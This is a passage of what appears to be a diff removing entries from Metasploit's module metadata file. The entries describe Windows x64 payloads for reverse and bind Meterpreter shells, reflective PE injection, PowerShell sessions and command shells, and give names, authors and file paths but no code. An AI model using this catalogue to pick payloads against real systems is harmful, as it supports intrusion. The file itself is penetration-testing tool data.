Requires Windows XP SP2 or newer.\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_windows/x64/meterpreter/reverse_winhttp": { - "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/windows/x64/meterpreter/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_winhttp.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_windows/x64/meterpreter/reverse_winhttps": { - "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/windows/x64/meterpreter/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_winhttps.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_windows/x64/meterpreter_bind_named_pipe": { - "name": "Windows Meterpreter Shell, Bind Named Pipe Inline (x64)", - "fullname": "payload/windows/x64/meterpreter_bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "UserExistsError", - "sf ", - "OJ Reeves" - ], - "description": "Connect to victim and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter_bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/meterpreter_bind_tcp": { - "name": "Windows Meterpreter Shell, Bind TCP Inline (x64)", - "fullname": "payload/windows/x64/meterpreter_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves", - "sf " - ], - "description": "Connect to victim and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/meterpreter_reverse_http": { - "name": "Windows Meterpreter Shell, Reverse HTTP Inline (x64)", - "fullname": "payload/windows/x64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves", - "sf " - ], - "description": "Connect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/meterpreter_reverse_https": { - "name": "Windows Meterpreter Shell, Reverse HTTPS Inline (x64)", - "fullname": "payload/windows/x64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves", - "sf " - ], - "description": "Connect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/meterpreter_reverse_ipv6_tcp": { - "name": "Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)", - "fullname": "payload/windows/x64/meterpreter_reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves", - "sf " - ], - "description": "Connect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter_reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/meterpreter_reverse_tcp": { - "name": "Windows Meterpreter Shell, Reverse TCP Inline x64", - "fullname": "payload/windows/x64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves", - "sf " - ], - "description": "Connect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/peinject/bind_ipv6_tcp": { - "name": "Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/windows/x64/peinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "sf " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/peinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_windows/x64/peinject/bind_ipv6_tcp_uuid": { - "name": "Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/windows/x64/peinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/peinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_windows/x64/peinject/bind_named_pipe": { - "name": "Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/windows/x64/peinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "UserExistsError" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/x64/peinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_windows/x64/peinject/bind_tcp": { - "name": "Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager", - "fullname": "payload/windows/x64/peinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "sf " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/peinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_windows/x64/peinject/bind_tcp_rc4": { - "name": "Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/x64/peinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/x64/peinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_windows/x64/peinject/bind_tcp_uuid": { - "name": "Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/windows/x64/peinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/peinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_windows/x64/peinject/reverse_named_pipe": { - "name": "Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/windows/x64/peinject/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "OJ Reeves" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/x64/peinject/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_windows/x64/peinject/reverse_tcp": { - "name": "Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager", - "fullname": "payload/windows/x64/peinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "sf " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/peinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_windows/x64/peinject/reverse_tcp_rc4": { - "name": "Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/x64/peinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/x64/peinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_windows/x64/peinject/reverse_tcp_uuid": { - "name": "Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/windows/x64/peinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/peinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_windows/x64/pingback_reverse_tcp": { - "name": "Windows x64 Pingback, Reverse TCP Inline", - "fullname": "payload/windows/x64/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7" - ], - "description": "Connect back to attacker and report UUID (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/pingback_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/powershell_bind_tcp": { - "name": "Windows Interactive Powershell Session, Bind TCP", - "fullname": "payload/windows/x64/powershell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": 
"Listen for a connection and spawn an interactive powershell session", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/powershell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/powershell_reverse_tcp": { - "name": "Windows Interactive Powershell Session, Reverse TCP", - "fullname": "payload/windows/x64/powershell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Listen for a connection and spawn an interactive powershell session", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/powershell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/powershell_reverse_tcp_ssl": { - "name": "Windows Interactive Powershell Session, Reverse TCP SSL", - "fullname": "payload/windows/x64/powershell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - 
"Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Listen for a connection and spawn an interactive powershell session over SSL", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/payloads/singles/windows/x64/powershell_reverse_tcp_ssl.rb", - "is_install_path": true, - "ref_name": "windows/x64/powershell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/shell/bind_ipv6_tcp": { - "name": "Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/windows/x64/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf " - ], - "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_windows/x64/shell/bind_ipv6_tcp_uuid": { - "name": "Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/windows/x64/shell/bind_ipv6_tcp_uuid", - 
"aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "OJ Reeves" - ], - "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/shell/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_windows/x64/shell/bind_named_pipe": { - "name": "Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/windows/x64/shell/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "UserExistsError" - ], - "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/x64/shell/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_windows/x64/shell/bind_tcp": { - "name": "Windows x64 
Command Shell, Windows x64 Bind TCP Stager", - "fullname": "payload/windows/x64/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf " - ], - "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_windows/x64/shell/bind_tcp_rc4": { - "name": "Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/x64/shell/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": 